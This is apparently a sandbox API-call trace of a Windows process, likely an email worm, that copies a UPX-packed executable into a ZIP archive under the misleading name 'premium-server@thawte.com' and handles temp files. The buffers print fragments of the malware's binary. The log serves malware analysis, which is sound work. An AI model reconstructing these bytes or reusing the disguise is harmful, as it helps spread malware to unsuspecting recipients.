Buffer => \x9b\xc6.\xfa\xff\xff\xff\x92\x96\xcc@\QP\x11nE\x11u\xb6\xcf\xaf,Y\x92\x1fEN\xc4\xe3\xeajq\x1a\xba\x0f\xff\x17\xfe79z`S\xce\xac\xc6<Q\xdf\xa4W\x11mW48\xcaQ\x16\xc1\xf4\xb7\xf8\xed\xd6\x1ck\xc3t\x11\x04N\xd1X\x9e!$'\xdf\xa7\xff_\xe2o,'a\xa7K6\x19\x19\x1b\xc0[\xe2\xed\x11Z@Y\xfd\x87\xed[\xfc\xff\xffP\x89\x14Le\x9f8\xf1\T7r\x16\xf9+i\xcb<(\x1a\xbf\x1b\x83_\xf8\x05\x16\xfa\x8dy\x89[zcC+\xa9\x1b\x80\x06\xa7\xff\xff\xff\x97Uah_\x90)\x8c\xe5P\xb4\x19{\x90\x83\x0e\xff#\xd4Qb\x1f\xab\x1b\xc4I2\x90\xfd_\xfa\xff\x96@\x90\xab\x8d,2\xf5\x11`\xab\x04\xbdv\xba\xae\x9c\xafN\xfe\x8eaEP\xff\xad\xfeKepj\x80\xe4}\x06'\xc0Q\x9e\xec\xe27=\xa5 \xd8\xfb\xff_\xf8j\x07\xcc\xc3\x06\xf21\xfa\x9e\xb3\xfbG\x12 k}GE\x01\x9eB FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,658 | 364 | NtWriteFile |
Buffer => \x9b\xc6.\xfa\xff\xff\xff\x92\x96\xcc@\QP\x11nE\x11u\xb6\xcf\xaf,Y\x92\x1fEN\xc4\xe3\xeajq\x1a\xba\x0f\xff\x17\xfe79z`S\xce\xac\xc6<Q\xdf\xa4W\x11mW48\xcaQ\x16\xc1\xf4\xb7\xf8\xed\xd6\x1ck\xc3t\x11\x04N\xd1X\x9e!$'\xdf\xa7\xff_\xe2o,'a\xa7K6\x19\x19\x1b\xc0[\xe2\xed\x11Z@Y\xfd\x87\xed[\xfc\xff\xffP\x89\x14Le\x9f8\xf1\T7r\x16\xf9+i\xcb<(\x1a\xbf\x1b\x83_\xf8\x05\x16\xfa\x8dy\x89[zcC+\xa9\x1b\x80\x06\xa7\xff\xff\xff\x97Uah_\x90)\x8c\xe5P\xb4\x19{\x90\x83\x0e\xff#\xd4Qb\x1f\xab\x1b\xc4I2\x90\xfd_\xfa\xff\x96@\x90\xab\x8d,2\xf5\x11`\xab\x04\xbdv\xba\xae\x9c\xafN\xfe\x8eaEP\xff\xad\xfeKepj\x80\xe4}\x06'\xc0Q\x9e\xec\xe27=\xa5 \xd8\xfb\xff_\xf8j\x07\xcc\xc3\x06\xf21\xfa\x9e\xb3\xfbG\x12 k}GE\x01\x9eB FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,668 | 364 | NtReadFile |
Buffer => a\xedWA%\xfd_\xf1NJ\x1d\xbcp\xab\xff\xc59\x04'c\xd1\xbf7 \xaaEbz!o%\xfd\xff/-\x03 \xf6\xa5*M
\x01W\x81A\xc1 \xbaE\xcdqB\x8f\xcc\x89\x03yF\x14a\xbe!\xa8c\xff\xb7m\x11m\xcc\x05\x81\xbe\xbe\x16\xc2\x8c\xbe\xaaQ\xd1\x00\xcb{\xe3\xff\x8dG2F\x06@\x9a4F\xca_\xc2\xaf\xbdO3\xac\xf9A+\xdd\x0e\xd8\x11P\x81\x0c2\xae*\x0e\xa5.\xc1\x072\xa5p\x88s3L\xe1\x1d\xd8\xb7\xbaI=\xc2\x8e55\xc8\x84/\x88\xc2B\xf6\x84\x0c4a\x00\x1cL\x0b\xfc\xb7\x7f\xc2\x80C\xc0\xbcA\xb2\x95\xc2\x90@\xccUn\xc2\xbc\xf9NJ\xf1F\xee\xcbC\x03\x94\xa4\xb6\xa8"\x8b\xfe\xd2\xff
\xf4C\xc2\x83E\xc8F\xc2\x86E\xc2\x086\xb0@\x8e\xa8
\x97\xd8\xba\xef\x16\x1f\xc8\xb6\xf85\xa9\xcb)m\xcd@6\xc1\xc2o\xf5\xb6\xc1~@V\xcaF\xcb\x1eET\xa96\xf8\xfd\xbf\x0e\x81Q\xc7\x85h\xb9\xc1 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,668 | 364 | NtWriteFile |
Buffer => a\xedWA%\xfd_\xf1NJ\x1d\xbcp\xab\xff\xc59\x04'c\xd1\xbf7 \xaaEbz!o%\xfd\xff/-\x03 \xf6\xa5*M
\x01W\x81A\xc1 \xbaE\xcdqB\x8f\xcc\x89\x03yF\x14a\xbe!\xa8c\xff\xb7m\x11m\xcc\x05\x81\xbe\xbe\x16\xc2\x8c\xbe\xaaQ\xd1\x00\xcb{\xe3\xff\x8dG2F\x06@\x9a4F\xca_\xc2\xaf\xbdO3\xac\xf9A+\xdd\x0e\xd8\x11P\x81\x0c2\xae*\x0e\xa5.\xc1\x072\xa5p\x88s3L\xe1\x1d\xd8\xb7\xbaI=\xc2\x8e55\xc8\x84/\x88\xc2B\xf6\x84\x0c4a\x00\x1cL\x0b\xfc\xb7\x7f\xc2\x80C\xc0\xbcA\xb2\x95\xc2\x90@\xccUn\xc2\xbc\xf9NJ\xf1F\xee\xcbC\x03\x94\xa4\xb6\xa8"\x8b\xfe\xd2\xff
\xf4C\xc2\x83E\xc8F\xc2\x86E\xc2\x086\xb0@\x8e\xa8
\x97\xd8\xba\xef\x16\x1f\xc8\xb6\xf85\xa9\xcb)m\xcd@6\xc1\xc2o\xf5\xb6\xc1~@V\xcaF\xcb\x1eET\xa96\xf8\xfd\xbf\x0e\x81Q\xc7\x85h\xb9\xc1 FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,668 | 364 | NtReadFile |
Buffer => z\x19\xf2\xce\x10\x14\xa2x\xae[P\x08"97\xa1+3*a*!\x02J\x0ff\xb3T\xcd \x01\xa1U\\x0f\x16\xb0\xdfNBuffA\x0f\x0bLow\xf6\x19\xb6#wvIr\x94#w
\x85\x9bqZ\xf4\xcc\x0cM\x82\xc2\x00\xa8mY\xb6M\xd7\xb7\xd8b@\xff\x04\x02\x13\x0beY\x96e4\x17\x12\x10\x03\xabeY\x96\x0f \x14s9\xbf\xff\x84\xbc<PEL\x01\x03\xe0\x00\x0f\x01\x0b\x01\x07\xae{\xd2l\x13r*\x802\x04\x10\x03\x82lg\xb1\x905\x0b\x023\x04\x99[\xd2\xcd\x07\x0c\xd0\x1e4{\xd9\x1b\xd8\x10\x07\x06\x00\xc0y\x08@\x80[dx\x02\x18\x05F\xb8\xc2v+dx\x01\x1e./\xd8\x93\xa0\x98\xa4p\x90\xeb6\x7f\xbb\xb0\x04# \x0b`.data\x98#\xeeB\xba\xc1\xfb"'v@\xbd\xcd`\x1b\x85.\xe5 \x00\xc3\xc0\x06|\xbf){4'@\x1b\xb0{
\x94\x00\x00JA< \x00\x00\x00\xff\x00\x00\x00\x00\x00 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,668 | 364 | NtWriteFile |
Buffer => z\x19\xf2\xce\x10\x14\xa2x\xae[P\x08"97\xa1+3*a*!\x02J\x0ff\xb3T\xcd \x01\xa1U\\x0f\x16\xb0\xdfNBuffA\x0f\x0bLow\xf6\x19\xb6#wvIr\x94#w
\x85\x9bqZ\xf4\xcc\x0cM\x82\xc2\x00\xa8mY\xb6M\xd7\xb7\xd8b@\xff\x04\x02\x13\x0beY\x96e4\x17\x12\x10\x03\xabeY\x96\x0f \x14s9\xbf\xff\x84\xbc<PEL\x01\x03\xe0\x00\x0f\x01\x0b\x01\x07\xae{\xd2l\x13r*\x802\x04\x10\x03\x82lg\xb1\x905\x0b\x023\x04\x99[\xd2\xcd\x07\x0c\xd0\x1e4{\xd9\x1b\xd8\x10\x07\x06\x00\xc0y\x08@\x80[dx\x02\x18\x05F\xb8\xc2v+dx\x01\x1e./\xd8\x93\xa0\x98\xa4p\x90\xeb6\x7f\xbb\xb0\x04# \x0b`.data\x98#\xeeB\xba\xc1\xfb"'v@\xbd\xcd`\x1b\x85.\xe5 \x00\xc3\xc0\x06|\xbf){4'@\x1b\xb0{
\x94\x00\x00JA< \x00\x00\x00\xff\x00\x00\x00\x00\x00 FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,668 | 364 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x00\x00 \x00\x00\x80\x0e\x00\x00\x00\x90\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00@\x00\x00\x80\x02\x00\x00\x00h\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00X\x00\x00\x00\xd8\xf0\x00\x00\xe8\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00\x80\x00\x00\x00\xc4\xf3\x00\x00(\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xd0\x00\x00\x80\xa8\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00\xc0\x00\x00\x00\xf0\xf4\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x000\x00\xe0\xc0\x00\x00(\x00\x00\x00 \x00\x00\x00@\x00\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\x80\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,668 | 364 | NtWriteFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x00\x00 \x00\x00\x80\x0e\x00\x00\x00\x90\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00@\x00\x00\x80\x02\x00\x00\x00h\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00X\x00\x00\x00\xd8\xf0\x00\x00\xe8\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00\x80\x00\x00\x00\xc4\xf3\x00\x00(\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xd0\x00\x00\x80\xa8\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00\xc0\x00\x00\x00\xf0\xf4\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x000\x00\xe0\xc0\x00\x00(\x00\x00\x00 \x00\x00\x00@\x00\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\x80\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,668 | 364 | NtReadFile |
Buffer => \x80\x00\x80\x00\x80\x80\x00\x00\xc0\xc0\xc0\x00\x80\x80\x80\x00\x00\x00\xff\x00\x00\xff\x00\x00\x00\xff\xff\x00\xff\x00\x00\x00\xff\x00\xff\x00\xff\xff\x00\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8f\xff\xff\xff\xff\xff\x00\x00\x88\xff\xff\xff\xff\xf8\x00\x00\x8f\x8f\xff\xff\xff\x8f\x00\x00\x8f\xf8\xff\xff\xf8\xff\x00\x00\x8f\x8f\x88\x88\x8f\x8f\x00\x00\x88\xf7\xf7\xf7\xf7\xf8\x00\x00\x8f\x7f\x7f\x7f\x7f\x7f\x00\x00\x08\xf7\xf7\xf7\xf7\xf0\x00\x00\x00\x8f\x7f\x7f\x7f\x00\x00\x00\x00\x08\xf7\xf7\xf0\x00\x00\x00\x00\x00\x88\x88\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x00\x00\xff\xff\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xe0\x03\x00\x00\xf0\x07\x00\x00\xf8\x0f\x00\x00\xfc\x1f\x00\x00\xff\xff\x00\x00\xff\xff\x00\x00\xf0\xc4\x00\x00\x00\x00\x01\x00\x02\x00 \x10\x00\x01\x00\x04\x00\xe8\x02 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,678 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001a0 |
FAILURE | 3221225489 | |
| 07:44:02,678 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\Internet Explorer\Desktop.htt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,678 | 364 | NtWriteFile |
Buffer => \x80\x00\x80\x00\x80\x80\x00\x00\xc0\xc0\xc0\x00\x80\x80\x80\x00\x00\x00\xff\x00\x00\xff\x00\x00\x00\xff\xff\x00\xff\x00\x00\x00\xff\x00\xff\x00\xff\xff\x00\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8f\xff\xff\xff\xff\xff\x00\x00\x88\xff\xff\xff\xff\xf8\x00\x00\x8f\x8f\xff\xff\xff\x8f\x00\x00\x8f\xf8\xff\xff\xf8\xff\x00\x00\x8f\x8f\x88\x88\x8f\x8f\x00\x00\x88\xf7\xf7\xf7\xf7\xf8\x00\x00\x8f\x7f\x7f\x7f\x7f\x7f\x00\x00\x08\xf7\xf7\xf7\xf7\xf0\x00\x00\x00\x8f\x7f\x7f\x7f\x00\x00\x00\x00\x08\xf7\xf7\xf0\x00\x00\x00\x00\x00\x88\x88\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x00\x00\xff\xff\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xe0\x03\x00\x00\xf0\x07\x00\x00\xf8\x0f\x00\x00\xfc\x1f\x00\x00\xff\xff\x00\x00\xff\xff\x00\x00\xf0\xc4\x00\x00\x00\x00\x01\x00\x02\x00 \x10\x00\x01\x00\x04\x00\xe8\x02 FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,678 | 364 | NtReadFile |
Buffer => \x0b2}\x99\xfeL\x82m\xf4\xb7p>\x0b\xb4\x02\xdc\xf4^s\x8e\x0b\x98~I\xf4"\xd0\x00\x0b.K\x99\x95\xbez\x87\xaa\xe9\x8e'\xaa\xe9\x85\x0e\x15A\x85y\xaa\xe9\x84\x7fq\x04*m\xc3\xbf\xf3\xafe\xc3\xc2\xc6D\x18\x06\x90{O\xf9\x12\xab\x96\xd0K\xb4\xe7\x13m\xab\xd2(\xdckZ=}{O\xf8Ny\x85\xa5h\x83\xfa1\xda\xd7\xe74og@\xf6\xf1\xbc\xad\xcfal\x12\xf4\xbc\xbc\xad\xce(l \xfc\x0fg@^\x8d\xa0\x0c\x14\xab\xf4\x11\xc1cD\xb6\xa6\x94[\x03\xa0;\xf6
\xe1\xa3O\xc3\xaa-P5\xef3U\xf3\xeb:\x12r\xc0\x13\xfd\xfe\xfe\xf7\xf6\xcb\x0eZFo\x1b\x7f\xe9}t\x91\xfd,\x12\xcd\xe7\x8d?\xe9\xf6\xc8\x0f\xe0l\x8e\xb7\xaeS\xd9I4\x8846\xb8\x9c\x11x]S\xd9H\xd8\x97\x81\x03&\x9c\xb4\x9e\xb08\x93\xac"gl\x9d\x89\x88 g\xdf\x88\xa4\xf3\xa2\x88&?}\x88\xed\xa3T\x88\x05\xe9]\x97Tl\x19\x9cc,3 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,678 | 364 | NtWriteFile |
Buffer => \x0b2}\x99\xfeL\x82m\xf4\xb7p>\x0b\xb4\x02\xdc\xf4^s\x8e\x0b\x98~I\xf4"\xd0\x00\x0b.K\x99\x95\xbez\x87\xaa\xe9\x8e'\xaa\xe9\x85\x0e\x15A\x85y\xaa\xe9\x84\x7fq\x04*m\xc3\xbf\xf3\xafe\xc3\xc2\xc6D\x18\x06\x90{O\xf9\x12\xab\x96\xd0K\xb4\xe7\x13m\xab\xd2(\xdckZ=}{O\xf8Ny\x85\xa5h\x83\xfa1\xda\xd7\xe74og@\xf6\xf1\xbc\xad\xcfal\x12\xf4\xbc\xbc\xad\xce(l \xfc\x0fg@^\x8d\xa0\x0c\x14\xab\xf4\x11\xc1cD\xb6\xa6\x94[\x03\xa0;\xf6
\xe1\xa3O\xc3\xaa-P5\xef3U\xf3\xeb:\x12r\xc0\x13\xfd\xfe\xfe\xf7\xf6\xcb\x0eZFo\x1b\x7f\xe9}t\x91\xfd,\x12\xcd\xe7\x8d?\xe9\xf6\xc8\x0f\xe0l\x8e\xb7\xaeS\xd9I4\x8846\xb8\x9c\x11x]S\xd9H\xd8\x97\x81\x03&\x9c\xb4\x9e\xb08\x93\xac"gl\x9d\x89\x88 g\xdf\x88\xa4\xf3\xa2\x88&?}\x88\xed\xa3T\x88\x05\xe9]\x97Tl\x19\x9cc,3 FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,678 | 364 | NtReadFile |
Buffer => \xaeX\xa8\xb6\xfaEA\xb0\x91\x0fW%^\x0bU\x12\x91\x0fWEUW\x19\xf3\xfaEaP\x91\x0f]^\xb3\x01`\x9bC\xc8\x00\xf1\\x7f\xf4mH\x0e\xd4\xceW\xbb$e\xe7\x1c\x96\x04W\xbb3\x82\xe7\x15\x06h\x99\xeaZI\xca\x05\x85\x97\xcd\xfe\xb5^b\xe5\xeeKi\xd9;\x91\xcd\xf7\xb6\x06\xa6\xbd\xa5\xb8\xa6\xbd\x8e\xe8\x921e\xcbb*7\xe9\xc6%\x82\xe0}r\x1b"v\x8b\x1f\xaf\xf2H?\xdagO\x9a?m\x99hD\x1c\x9c\xb6O\xe7\x93\x07\x87#\xcbH\xf4\xf8%d\xdb\xf8&\x7f\x90\xec\xa5M\xd7\xf3T\xd8d\xe3\x18$\xbe\xa9v\x92P\xffw\xce\xc7V\xf3\x06W\xa9h?\x9f\xa9\xc0\xd2\x1fV\xeeN\x83V\x83\x02\xa4\xa9\xe9\xb3v FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,678 | 364 | NtWriteFile |
Buffer => \xaeX\xa8\xb6\xfaEA\xb0\x91\x0fW%^\x0bU\x12\x91\x0fWEUW\x19\xf3\xfaEaP\x91\x0f]^\xb3\x01`\x9bC\xc8\x00\xf1\\x7f\xf4mH\x0e\xd4\xceW\xbb$e\xe7\x1c\x96\x04W\xbb3\x82\xe7\x15\x06h\x99\xeaZI\xca\x05\x85\x97\xcd\xfe\xb5^b\xe5\xeeKi\xd9;\x91\xcd\xf7\xb6\x06\xa6\xbd\xa5\xb8\xa6\xbd\x8e\xe8\x921e\xcbb*7\xe9\xc6%\x82\xe0}r\x1b"v\x8b\x1f\xaf\xf2H?\xdagO\x9a?m\x99hD\x1c\x9c\xb6O\xe7\x93\x07\x87#\xcbH\xf4\xf8%d\xdb\xf8&\x7f\x90\xec\xa5M\xd7\xf3T\xd8d\xe3\x18$\xbe\xa9v\x92P\xffw\xce\xc7V\xf3\x06W\xa9h?\x9f\xa9\xc0\xd2\x1fV\xeeN\x83V\x83\x02\xa4\xa9\xe9\xb3v FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,678 | 364 | NtReadFile |
Buffer => FileHandle => 0x00000188 |
FAILURE | 3221225489 | |
| 07:44:02,678 | 364 | NtWriteFile |
Buffer => PK\x01\x02\x14\x00
\x00\x00\x00\x00\x00\x81\x95\xde0+[\xff\xe3\xc0p\x00\x00\xc0p\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,678 | 364 | NtWriteFile |
Buffer => premium-server@thawte.com FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,678 | 364 | NtWriteFile |
Buffer => PK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00G\x00\x00\x00\xf7p\x00\x00\x00\x00 FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:02,698 | 504 | NtReadFile |
Buffer => \xff\xfe<\x00!\x00-\x00-\x00-\x00-\x00
\x00
\x00*\x00*\x00*\x00*\x00*\x00 \x00T\x00h\x00i\x00s\x00 \x00f\x00i\x00l\x00e\x00 \x00i\x00s\x00 \x00a\x00u\x00t\x00o\x00m\x00a\x00t\x00i\x00c\x00a\x00l\x00l\x00y\x00 \x00g\x00e\x00n\x00e\x00r\x00a\x00t\x00e\x00d\x00 \x00b\x00y\x00 \x00M\x00i\x00c\x00r\x00o\x00s\x00o\x00f\x00t\x00 \x00W\x00i\x00n\x00d\x00o\x00w\x00s\x00 \x00*\x00*\x00*\x00*\x00*\x00
\x00
\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00-\x00>\x00
\x00
\x00<\x00H\x00T\x00M\x00L\x00>\x00
\x00
\x00<\x00B\x00O\x00D\x00Y\x00 \x00b\x00a\x00c\x00k\x00g\x00r\x00o\x00u\x00n\x00d\x00=\x00"\x00"\x00 \x00s\x00t\x00y\x00l\x00e\x00=\x00"\x00b\x00o\x00 FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,698 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001a0 |
FAILURE | 3221225489 | |
| 07:44:02,698 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:02,728 | 364 | DeleteFileA |
FileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\tmp1.tmp |
SUCCESS | 0x00000001 | |
| 07:44:02,728 | 364 | NtCreateFile |
ShareAccess => 0 FileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\tmp3.tmp DesiredAccess => 0x80100080 CreateDisposition => 2 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,728 | 364 | NtCreateFile |
ShareAccess => 3 FileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\tmp2.tmp DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,728 | 364 | NtCreateFile |
ShareAccess => 3 FileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\tmp3.tmp DesiredAccess => 0x40100080 CreateDisposition => 5 FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,728 | 364 | NtSetInformationFile |
FileHandle => 0x00000188 FileInformation => |
SUCCESS | 0x00000000 | |
| 07:44:02,728 | 364 | NtReadFile |
Buffer => PK\x03\x04
\x00\x00\x00\x00\x00\x81\x95\xde0+[\xff\xe3\xc0p\x00\x00\xc0p\x00\x00\x19\x00\x00\x00premium-server@thawte.comMZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4 \xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode.
$\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,728 | 364 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x001.24\x00UPX!\x0c \x02 \x19\xfb\x87H\x91\xa6q\xb5\x12\xc6\x00\x00\xfb\\x00\x00\x00\x9e\x00\x00&\x01\x00w\xff\x87\xa8\x90\x00kernel32.d\xff\x9b\xe7\xdfll5root\IEFrame\x00ATV\xfe\xff\xfcH_Noterctrl_renwnd\x0f\xff\xb7\xff\xff|y_\xee\xcf\xb9\xdd\xdeg;\x84\x15\x80\xd4\x00\x1e8 \xb2\x9f\xfb\x15\x00\x8d\x06\x18x\xb6\xff\xff\xff\x0f@@\x03\x00\x1d+\xf4A\x81O\xcd\xfc\xff\xd7%k\x08\x00\x01@<\x8fS\x016@\xffn\xff\xdfT\xf1\xfd\xa73\xbb\xbd\x9aA\x14\x04W\x85\x0e\x06@]\x10\x00\x18\x04/\xb7\xdb\xdd@\x08\x1f\x00-
\x03y(\x07\xa4,\x8a\xdc\x02\x97\xbf\xfc\xe5\x00\xbe\x0e/\x1b\x00\x00\xbf\x06\xa78\x04\x00\x85/\x05\x13\xb7\xb7\xff\xf2\x01\x00\x15]\x8e_\xce\x0bDe FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,728 | 364 | NtReadFile |
Buffer => \x19\x08\xdf\xe8$\xa7/\x8f\x90\xc1\xce\xf2\xd8$\x0c\x07\xc8\xcf\x9e\x1dd\xc0\xb8$g\xb4$o\xac$ '\xdf%
\x1f%|<{\xf2\xecL$\xf7h P\x1do\xd8\x19\xc1V\x89e\xcf\x97\xe0 \xb7\xbf\xf5\xcd\xba\x04{$t|\xf3 $T},{\x0c{M\x07\xadf\xe0|m}\x1c \xf9U\xc4\xe0\xf6`m|\xa4\x02} \x8c\xd8\x02\x0e\x0c\x9d@\xd4|
1\xd6\x1a\x0ci\x18\x1d@ \x8b\x02\x97(.\xd9d \x94\xbc\x83?hm $A+rm b\xedo
\x9aXM){:|,}|\x01m\x83\xdf\x02\xa2t\x14 kTw%\x95h\x1d|\x19|\xda ,\x86_{\xef\xa0\x10t}{.|*)\x00}m\xad\xb5\xdb
\x01{W\x1f'\x88.d6\x13G\xa2<\xd0|f_\x05r\x9fh\xad\xdd\x0cei\x17u\x083s}\xdb]\xbb{i^|Y}\x1f\xdce{-Amm\x9bD{\xd0\x06\x93\x1c{! FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,728 | 364 | NtReadFile |
Buffer => q</>G#\x1c\x0eL\xedwi(t\x0e.\x8d\x00\x05@$F|OZ)\x02
Gf\xe8\x80\xc0\x9a\xdb^\xc2F/\xd8 \xc9-a\xf8N\x15\x90\xe5\x95o\x19\xe2\xb0\x81\xd4\x80l\x14\x85dW\xa9\xd4\xfeL$w{S\x17\xf9\xd2un\xb7] d [\xe5]|\x08i|\xeb\xc2\xbe\xafZ\x96-\x00 \xe4a\xb1\x1c\x07\x0cnrR\x9b\x1e\x98\xc5\\xfb\xda\xa7n\xfbfSm\x82\xb0=C\xac\x1a8P\xdf\xbdt\xb6\x1a\xc1fvMa\xa0c\x14k\x06\xae\xc6 \xb3\x93\xcd\x1e\xce\xf3R\x80g@.\xb7=Zk\x00\xb8\xeb1\k~\x0c\xda\xe3\x89\x0bh\x96\xaa\x89\xb9\x9c\x9b\x14TDFQ\xe2\xedSk1\xbe\xbd{>\x00 MA\xdc\xb6\xe8\xde\xef F{\xe2|\xfbM\x16$f^s}3s\x00 50$\xfb
_`{P\xea5R.\xb8RA5\x1a[\xd7\xd5\x88 D\x00_\xec\x034\xf7\x11U^
\x14|A FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,738 | 364 | NtReadFile |
Buffer => n
\x9b\xb9vwkz0123456\x86\x1e\x04\xf8789+/\xc7X-Pf\xa9\x956n\x02ty 3o\x0e\xd3\xefc\xc0^\xc9\x15N1l\x1a0#\x1ex\x18nM\xe7\xe8\xd2R\xc1/l1o\xb6Ex\x0b\x94v`
D6.\xa9\xb26+|\xccu\x040\x003IMEO(4\xfb\xd0\xc8U\x89\x80PBy@\xb2\x9d\xa1\x01M\xce\x1e V9\x1d\xae\xb66\x01\x9bCB2-*\x94\xb6\xd6Ty\x94@mX\xd5\xb8m\x0b\x1b\xact/\xf3xG;! b\xed-\xbc\x1d\xee\x11y="N"1\x00\x0f4\xf4k\x05q-V\xcei\x801h\xce\x11kO\x18\xfcC\x07b\xad\x19h\x98j\x8b
1\x17\xd0\xa0a\x06\x85
7\xd6>1\xac\x9f
